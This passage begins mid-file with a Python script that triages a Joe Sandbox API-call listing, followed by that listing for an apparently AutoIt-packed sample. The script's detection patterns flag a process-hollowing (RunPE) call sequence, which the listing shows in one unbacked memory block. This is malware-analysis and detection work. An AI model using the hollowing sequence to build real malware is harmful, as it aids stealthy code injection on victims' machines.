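    r"(?:[•*-]\s*)?(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"([\w@]+)\.(\w+)(?:\((.*)\))?,?\s*ref:\s*([0-9A-Fa-f]+)"
)
HIVES = {"80000001": "HKCU", "80000002": "HKLM"}
# Process-hollowing (RunPE) prologue: spawn a child, read its initial thread
# context, then read from its memory before the payload is mapped and written.
HOLLOWING_PROLOGUE = ("CreateProcess", "GetThreadContext", "ReadProcessMemory")

@dataclass(frozen=True)
class Call:
    api: str       # as printed, e.g. 'Wow64GetThreadContext'
    module: str    # e.g. 'KERNEL32'
    args: tuple    # argument strings; '?' is a value the sandbox could not resolve
    ref: int       # call-site address

@dataclass(frozen=True)
class Finding:
    block: int     # index of the 'APIs' block the finding came from
    rule: str
    severity: str
    detail: str

def canon(api: str) -> str:
    """Fold Wow64* and A/W variants so each rule is written once (heuristic: a
    trailing uppercase A or W is taken to be the ANSI/Unicode suffix)."""
    if api.startswith("Wow64"):
        api = api[5:]
    if len(api) > 1 and api.endswith(("A", "W")):
        api = api[:-1]
    return api

def parse_blocks(text: str) -> list[list[Call]]:
    """Split the listing at each 'APIs' header and parse the call lines under it."""
    blocks: list[list[Call]] = []
    for line in text.splitlines():
        if line.strip() == "APIs":
            blocks.append([])
            continue
        m = API_LINE.search(line)
        if m and blocks:
            args = tuple(a.strip() for a in m.group(3).split(",")) if m.group(3) else ()
            blocks[-1].append(Call(m.group(1), m.group(2), args, int(m.group(4), 16)))
    return blocks

def in_order(calls: list[Call], pattern: tuple) -> bool:
    """True if the canonical names in `pattern` occur as a subsequence of `calls`."""
    names = iter(canon(c.api) for c in calls)
    return all(any(n == want for n in names) for want in pattern)

def triage(text: str) -> list[Finding]:
    findings: list[Finding] = []
    for i, calls in enumerate(parse_blocks(text)):
        if in_order(calls, HOLLOWING_PROLOGUE):
            rpm = next(c for c in calls if canon(c.api) == "ReadProcessMemory")
            size = rpm.args[3] if len(rpm.args) > 3 else "?"
            detail = f"CreateProcess -> GetThreadContext -> ReadProcessMemory(size={size})"
            if size == "00000004":
                # In a freshly created 32-bit child, EBX of the initial context holds
                # the PEB; a 4-byte read right after GetThreadContext is consistent
                # with fetching PEB->ImageBaseAddress, the usual RunPE opening move.
                detail += "; 4-byte read after GetThreadContext is consistent with PEB->ImageBaseAddress"
            findings.append(Finding(i, "process_hollowing_prologue", "high", detail))
        for c in calls:
            name = canon(c.api)
            if name == "GetTempFileName" and len(c.args) > 1 and c.args[1] == "aut":
                findings.append(Finding(i, "autoit_temp_prefix", "medium",
                    "GetTempFileName prefix 'aut': the AutoIt runtime drops %TEMP%\\aut*.tmp"))
            if name == "RegOpenKeyEx" and len(c.args) > 1 and "Control Panel\\Mouse" in c.args[1]:
                hive = HIVES.get(c.args[0], c.args[0])
                findings.append(Finding(i, "mouse_swap_lookup", "info",
                    f"{hive}\\Control Panel\\Mouse read (SwapMouseButtons): AutoIt runtime behaviour, not credential access"))
    return findings

if __name__ == "__main__":
    for f in triage(SAMPLE_REPORT):
        print(f"block {f.block} [{f.severity}] {f.rule}: {f.detail}")
```

The subsequence match deliberately tolerates calls interleaved between the three prologue APIs, since the sandbox only lists the calls it resolved; extend `HOLLOWING_PROLOGUE` with `NtUnmapViewOfSection`, `WriteProcessMemory`, `SetThreadContext` and `ResumeThread` when the exported listing includes the rest of the chain.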
                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 006582F5
                                                                                • TerminateProcess.KERNEL32(00000000), ref: 006582FC
                                                                                • FreeLibrary.KERNEL32(?,?,?,?), ref: 006584DD
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Process$CurrentFreeLibraryTerminate
                                                                                • String ID:
                                                                                • API String ID: 146820519-0
                                                                                • Opcode ID: d868d70d25c608018d71d5535fb91c96804309b06442d47da7bba0e465db1100
                                                                                • Instruction ID: fcc475f219f1c1bd0108aa610d06c1106de8bb9ca04bb5b1c8b7d7b7a76f854b
                                                                                • Opcode Fuzzy Hash: d868d70d25c608018d71d5535fb91c96804309b06442d47da7bba0e465db1100
                                                                                • Instruction Fuzzy Hash: 4E126C719083419FC724DF28C484B6ABBE6BF85315F04895DE8899B392DB31ED49CB92
                                                                                APIs
                                                                                  • Part of subcall function 005D1BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 005D1BF4
                                                                                  • Part of subcall function 005D1BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 005D1BFC
                                                                                  • Part of subcall function 005D1BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 005D1C07
                                                                                  • Part of subcall function 005D1BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 005D1C12
                                                                                  • Part of subcall function 005D1BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 005D1C1A
                                                                                  • Part of subcall function 005D1BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 005D1C22
                                                                                  • Part of subcall function 005D1B4A: RegisterWindowMessageW.USER32(00000004,?,005D12C4), ref: 005D1BA2
                                                                                • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 005D136A
                                                                                • OleInitialize.OLE32 ref: 005D1388
                                                                                • CloseHandle.KERNEL32(00000000,00000000), ref: 006124AB
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                • String ID:
                                                                                • API String ID: 1986988660-0
                                                                                • Opcode ID: f5f4c8672db747f3acc07f6325bdd213f36a75832edd48dc684f1542d69961e0
                                                                                • Instruction ID: 32fb241025cb9d10d449cc4859886128f1dfbc8b6130a48bc9b26954b913e1fd
                                                                                • Opcode Fuzzy Hash: f5f4c8672db747f3acc07f6325bdd213f36a75832edd48dc684f1542d69961e0
                                                                                • Instruction Fuzzy Hash: 29719AF8D116118EC388FF7DA8596653EE3FB8B394F04A22A905ACF361EB3464018F54
                                                                                APIs
                                                                                  • Part of subcall function 005D3923: Shell_NotifyIconW.SHELL32(00000001,?), ref: 005D3A04
                                                                                • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0063C259
                                                                                • KillTimer.USER32(?,00000001,?,?), ref: 0063C261
                                                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0063C270
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: IconNotifyShell_Timer$Kill
                                                                                • String ID:
                                                                                • API String ID: 3500052701-0
                                                                                • Opcode ID: 7b9ad3fa0c0daef288c26dbbbfc750a6f1ad3862abdbbd73b09c7503215fec13
                                                                                • Instruction ID: 06f419d4c29fa966b5eaa85389b6f4506e15840e18fcdfa2c83f9f126909d79c
                                                                                • Opcode Fuzzy Hash: 7b9ad3fa0c0daef288c26dbbbfc750a6f1ad3862abdbbd73b09c7503215fec13
                                                                                • Instruction Fuzzy Hash: C431C570904344AFEB329F648855BE7BBEEAB07314F00149AE1DAA7241C7745A85CB91
                                                                                APIs
                                                                                • CloseHandle.KERNELBASE(00000000,00000000,?,?,006085CC,?,00698CC8,0000000C), ref: 00608704
                                                                                • GetLastError.KERNEL32(?,006085CC,?,00698CC8,0000000C), ref: 0060870E
                                                                                • __dosmaperr.LIBCMT ref: 00608739
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: CloseErrorHandleLast__dosmaperr
                                                                                • String ID:
                                                                                • API String ID: 2583163307-0
                                                                                • Opcode ID: a953a7eda6f74ab6b39f91f911ac720a563248c5a674dc52feeea4b74cbaf4c8
                                                                                • Instruction ID: 1aa9d27e98b3de9bd37292d4c2e6f0d9c8fd4a078a6398c2ed37a8f9ed0ef4b1
                                                                                • Opcode Fuzzy Hash: a953a7eda6f74ab6b39f91f911ac720a563248c5a674dc52feeea4b74cbaf4c8
                                                                                • Instruction Fuzzy Hash: 6B018E32A946301EDB6CE334A8457BF2B4B4B92774F3A051DF8459B2D3EFA2CC818654
                                                                                APIs
                                                                                • TranslateMessage.USER32(?), ref: 005DDB7B
                                                                                • DispatchMessageW.USER32(?), ref: 005DDB89
                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 005DDB9F
                                                                                • Sleep.KERNEL32(0000000A), ref: 005DDBB1
                                                                                • TranslateAcceleratorW.USER32(?,?,?), ref: 00621CC9
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Message$Translate$AcceleratorDispatchPeekSleep
                                                                                • String ID:
                                                                                • API String ID: 3288985973-0
                                                                                • Opcode ID: 4a7b3e9c798a9cdaddbb6e8f9190bcf8b71a437a9676e1655f298f2e0a750836
                                                                                • Instruction ID: 8d7fead3ddccb0f1eff803614dfa48908d3c244f1288b820cc41456a08cb2806
                                                                                • Opcode Fuzzy Hash: 4a7b3e9c798a9cdaddbb6e8f9190bcf8b71a437a9676e1655f298f2e0a750836
                                                                                • Instruction Fuzzy Hash: 1DF05E306487509BE730DB64DC49FEA7BBAFB86310F10491AE68AC71C0DB74A448DF26
                                                                                APIs
                                                                                • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,00642CD4,?,?,?,00000004,00000001), ref: 00642FF2
                                                                                • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00642CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00643006
                                                                                • CloseHandle.KERNEL32(00000000,?,00642CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0064300D
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: File$CloseCreateHandleTime
                                                                                • String ID:
                                                                                • API String ID: 3397143404-0
                                                                                • Opcode ID: 0f5ade69fe91d0654b248a332bd81b4660b4db89d710fba83aed852d51fa192a
                                                                                • Instruction ID: 6a87c4b6efcc85a34144a36e36e2556aa3198fee9aef2f88be02c96e77a32884
                                                                                • Opcode Fuzzy Hash: 0f5ade69fe91d0654b248a332bd81b4660b4db89d710fba83aed852d51fa192a
                                                                                • Instruction Fuzzy Hash: 7EE0863228062077D7302756BC0DFDB7E5DD7C6F75F104210F7A9751D086E1250142A8
                                                                                APIs
                                                                                • __Init_thread_footer.LIBCMT ref: 005E17F6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Init_thread_footer
                                                                                • String ID: CALL
                                                                                • API String ID: 1385522511-4196123274
                                                                                • Opcode ID: bda702b4471b1e6655cb6e43be3c9b194ad75aed77538e7717bdf5b2db0bfa43
                                                                                • Instruction ID: bc21ca314b959817c2e56b9fef3ea0b9d88b3bc8b3f8cff5232961d917c2078a
                                                                                • Opcode Fuzzy Hash: bda702b4471b1e6655cb6e43be3c9b194ad75aed77538e7717bdf5b2db0bfa43
                                                                                • Instruction Fuzzy Hash: 0E228B706087829FC718DF15C494A2ABBF2BF89314F14895DF4968B3A2D731E841CF96
                                                                                APIs
                                                                                • _wcslen.LIBCMT ref: 00646F6B
                                                                                  • Part of subcall function 005D4ECB: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,006A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 005D4EFD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad_wcslen
                                                                                • String ID: >>>AUTOIT SCRIPT<<<
                                                                                • API String ID: 3312870042-2806939583
                                                                                • Opcode ID: dd1c9580452bbfcaebe1352332b11d04b0751476f44bed6cd31b80acd59fd3bc
                                                                                • Instruction ID: 31086ab3a98ab0ca7287af9625e4b9c3dcf15a2b69bd8855478387fb029e3b41
                                                                                • Opcode Fuzzy Hash: dd1c9580452bbfcaebe1352332b11d04b0751476f44bed6cd31b80acd59fd3bc
                                                                                • Instruction Fuzzy Hash: 30B152311082029FCB24EF24D4959AEBBE6BFD4710F04495EF496973A1EB70ED49CB92
                                                                                APIs
                                                                                • Shell_NotifyIconW.SHELL32(00000000,?), ref: 005D3908
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: IconNotifyShell_
                                                                                • String ID:
                                                                                • API String ID: 1144537725-0
                                                                                • Opcode ID: 71c86828522cf18c0f3e8f161a9c20f287ffe6d5c05fd24278548128772a51b2
                                                                                • Instruction ID: 985aee70c18362b5593e0962be94a52b0b9b595328caf653aa03ff38d7fe53bc
                                                                                • Opcode Fuzzy Hash: 71c86828522cf18c0f3e8f161a9c20f287ffe6d5c05fd24278548128772a51b2
                                                                                • Instruction Fuzzy Hash: 7E3193B05057019FD720EF28D884797BBE4FB4A718F00092FF59A97380E7B1AA44DB52
                                                                                APIs
                                                                                • CreateProcessW.KERNELBASE(?,00000000), ref: 01A699F3
                                                                                • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01A69A89
                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01A69AAB
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1472344836.0000000001A67000.00000040.00000020.00020000.00000000.sdmp, Offset: 01A67000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_1a67000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                • String ID:
                                                                                • API String ID: 2438371351-0
                                                                                • Opcode ID: df6a772f5278f9eae63f3a29a40672dfa4321236305f3f5d8c91d224ff423281
                                                                                • Instruction ID: 13b76642866bde31ac637a414db085ec3c3871494a7e864c63bcdbc1388d211b
                                                                                • Opcode Fuzzy Hash: df6a772f5278f9eae63f3a29a40672dfa4321236305f3f5d8c91d224ff423281
                                                                                • Instruction Fuzzy Hash: BD12DD24E24658C6EB24DF64D8507DEB232EF68300F1090E9910DEB7A5E77A4F85CF5A
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: ProtectVirtual
                                                                                • String ID:
                                                                                • API String ID: 544645111-0
                                                                                • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                • Instruction ID: 947fb9c2903d2554480b0ab5b5a73afc4c96a0b58120a64f54d21fada5068f02
                                                                                • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                • Instruction Fuzzy Hash: 04310474A041499BD718CF5AD580969FFA2FF49300B7486A5E889CF651EB31EDC1CBC0
                                                                                APIs
                                                                                  • Part of subcall function 005D4E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,005D4EDD,?,006A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 005D4E9C
                                                                                  • Part of subcall function 005D4E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 005D4EAE
                                                                                  • Part of subcall function 005D4E90: FreeLibrary.KERNEL32(00000000,?,?,005D4EDD,?,006A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 005D4EC0
                                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,006A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 005D4EFD
                                                                                  • Part of subcall function 005D4E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00613CDE,?,006A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 005D4E62
                                                                                  • Part of subcall function 005D4E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 005D4E74
                                                                                  • Part of subcall function 005D4E59: FreeLibrary.KERNEL32(00000000,?,?,00613CDE,?,006A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 005D4E87
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Library$Load$AddressFreeProc
                                                                                • String ID:
                                                                                • API String ID: 2632591731-0
                                                                                • Opcode ID: bb99ae4b92fed511511bae20d61bb14f97f2b4dd1cb2d92242e43929cd4bc520
                                                                                • Instruction ID: 19d7db263839333eeb229c06171a97775e57494547dec6a4f4377c1662798597
                                                                                • Opcode Fuzzy Hash: bb99ae4b92fed511511bae20d61bb14f97f2b4dd1cb2d92242e43929cd4bc520
                                                                                • Instruction Fuzzy Hash: 1B119431610207ABDB34AB68D81ABAD7BA5BF80710F10442FF542A63E1EE749A459B51
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: __wsopen_s
                                                                                • String ID:
                                                                                • API String ID: 3347428461-0
                                                                                • Opcode ID: c09155578f7dfa56d7fad9625e3e360b0eca477f4fa75aee55e5ea8f5bdb493d
                                                                                • Instruction ID: 656de7eb35e5410caee334f0307ce157b6df157dbaaed7a70f5c5f51c8d63dc6
                                                                                • Opcode Fuzzy Hash: c09155578f7dfa56d7fad9625e3e360b0eca477f4fa75aee55e5ea8f5bdb493d
                                                                                • Instruction Fuzzy Hash: 1211067590410AAFCB09DF58E9419DB7BF5EF48314F144099F808AB352DA31EA118BA5
                                                                                APIs
                                                                                  • Part of subcall function 00604C7D: RtlAllocateHeap.NTDLL(00000008,005D1129,00000000,?,00602E29,00000001,00000364,?,?,?,005FF2DE,00603863,006A1444,?,005EFDF5,?), ref: 00604CBE
                                                                                • _free.LIBCMT ref: 0060506C
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: AllocateHeap_free
                                                                                • String ID:
                                                                                • API String ID: 614378929-0
                                                                                • Opcode ID: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                                                                • Instruction ID: a22c3d20efab02afac13fee568ba4a89dce7c500d43d8873112c67219eb3724d
                                                                                • Opcode Fuzzy Hash: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                                                                • Instruction Fuzzy Hash: F0014E722447055BE3358F55D84599FFBEEFB85370F25091DE186832C0EA306805CB74
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                                                • Instruction ID: db8acdf5fabf5a04d63d32f32ac4a39ce2eed5119d7a5437955293a2927511a0
                                                                                • Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                                                • Instruction Fuzzy Hash: 18F0F932510A1C9AC6353E65AC0AB7B3B99AF92330F100B19F621D71E2DF78980186A9
                                                                                APIs
                                                                                • RtlAllocateHeap.NTDLL(00000008,005D1129,00000000,?,00602E29,00000001,00000364,?,?,?,005FF2DE,00603863,006A1444,?,005EFDF5,?), ref: 00604CBE
